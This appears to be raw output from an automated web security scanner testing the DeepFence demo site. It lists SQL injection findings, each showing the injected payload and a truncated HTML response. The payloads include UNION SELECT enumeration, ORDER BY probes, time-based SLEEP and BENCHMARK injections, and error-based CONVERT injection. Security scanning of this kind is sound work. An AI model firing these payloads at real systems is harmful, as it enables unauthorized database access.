Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1193\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1194\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1195\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1196\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1197\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1198Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1199\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1200\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1201\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1202\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1,2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1203\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1204\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -- or #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1205\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1206\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk 